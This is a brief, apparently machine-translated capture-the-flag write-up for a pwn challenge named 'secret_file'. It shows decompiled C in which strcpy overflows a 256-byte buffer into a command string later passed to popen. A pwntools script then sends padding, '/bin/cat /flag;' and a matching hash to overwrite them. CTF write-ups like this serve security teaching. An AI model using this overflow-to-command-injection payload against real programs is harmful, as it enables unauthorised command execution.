[BMZCTF-pwn] 20-secret_ file

Problem of overflow in stack

After reading the program, it's over

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char *v3; // rax
  unsigned __int8 *v4; // rbp
  char *v5; // rbx
  __int64 v6; // rcx
  char *v7; // rdi
  unsigned int v8; // er12
  FILE *v9; // rbp
  size_t v11; // [rsp+0h] [rbp-308h] BYREF
  char *lineptr; // [rsp+8h] [rbp-300h] BYREF
  char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF  Input plaintext to be encrypted 
  char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF  Initialize the put command 
  char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF  Initialize the put sha256 value 
  _QWORD v16[4]; // [rsp+16Ch] [rbp-19Ch] BYREF
  char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF  Before user input 0x100 Encrypted sha256 value 
  int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
  char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
  unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]

  v20 = __readfsqword(0x28u);
  sub_E60(dest);                                // md5 Values in v15
  v11 = 0LL;
  lineptr = 0LL;
  if ( getline(&lineptr, &v11, stdin) == -1 )
    return 1;
  v3 = strrchr(lineptr, 10);
  if ( !v3 )
    return 1;
  *v3 = 0;
  v4 = (unsigned __int8 *)v16;
  v5 = v17;
  strcpy(dest, lineptr);
  sub_DD0((__int64)dest, v16, 0x100u);          //  To the front 0x100 String encryption 
  do
  {
    v6 = *v4;
    v7 = v5;
    v5 += 2;
    ++v4;
    snprintf(v7, 3uLL, "%02x", v6);
  }
  while ( v5 != (char *)&v18 );
  v8 = strcmp(v15, v17);
  if ( v8 )
  {
    puts("wrong password!");
    return 1;
  }
  v9 = popen(v14, "r");
  if ( !v9 )
    return 1;
  while ( fgets(s, 256, v9) )
    printf("%s", s);
  fclose(v9);
  return v8;
}

The program first combines a command with md5 Value in v14,v15 It's about . Then the user input value is put into desc It's about （v14 front ）. Here, as long as you enter super long v14,v15 Cover can .

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #

payload = b'A'*(256)+ b'/bin/cat /flag;'.ljust(27, b'#')+b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'
p.sendline(payload)
p.recv()
pause()